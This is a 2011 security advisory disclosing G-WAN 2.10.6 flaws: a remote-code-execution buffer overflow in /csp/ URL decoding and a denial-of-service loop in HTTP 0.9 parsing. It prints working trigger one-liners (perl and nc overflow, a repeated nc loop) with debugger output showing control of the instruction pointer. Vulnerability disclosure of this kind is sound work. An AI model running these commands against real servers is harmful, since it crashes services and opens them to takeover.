======================================================================== Title: Multiple G-WAN vulnerabilities Product: G-WAN (http://gwan.com/) Author: Fredrik Widlund E-mail: fredrik.widlund (at) gmail (dot) com Date: 2011-10-12 ======================================================================== 1. BACKGROUND "G-WAN is much smaller, faster and safer than the next best: - Web servers, - Web applications servers, - Web acceleration servers, - KV stores & noSQL databases." (from gwan.com) 2. DESCRIPTION Problems exist with design issues, parsing, signal handling, and buffer management. A) A buffer overflow issue exists in the routine handling URL encoding for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the vulnerability results in remotely being able to execute shellcode on the system. B) SIGPIPE signals were not handled correctly. Exploiting the vulnerability resulted in denial of service. C) Several minor issues. 3. DETAILS The vulnerabilities were discovered and successfully exploited on an Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR enabled. A) > perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80 [...] G-WAN 2.10.6 (pid:9167) [New LWP 9169] Program received signal SIGSEGV, Segmentation fault. [Switching to LWP 9169] 0x41414141 in ?? () (gdb) i r eax 0x31 49 ecx 0x81f2298 136258200 edx 0x0 0 ebx 0x41414141 1094795585 esp 0xf7da51f0 0xf7da51f0 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x10202 [ IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 A proof of concept exploit was created brute forcing the ASLR stack offset which leads to a vulnerable system being compromised remotely in less than 5 minutes, sending a request each second at the most to avoid the G-WAN watchdog giving up. B) The routines for parsing HTTP 0.9 were broken resulting in a infinitely looping reply. Repeatedly interrupting such loops will quickly result in denial of service. > while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done [...] G-WAN 2.10.6 (pid:3948) [New LWP 3951] Program received signal SIGPIPE, Broken pipe. [Switching to LWP 3951] 0xf7ffd430 in __kernel_vsyscall () 4. AFFECTED VERSIONS G-WAN 2.10.6 (October 6, 2011). There is no archive of older versions available and the vendor refuses to cooperate or acknowledge the issues. 5. SOLUTIONS The issues seems to be resolved. Upgrade to the latest version. 6. REFERENCES * http://gwan.com * http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance/ * http://lonewolfer.wordpress.com/2011/10/10/intermezzo-about-stability-and-compliance-part-2/ ======================================================================== Fredrik Widlund fredrik.widlund (at) gmail (dot) com
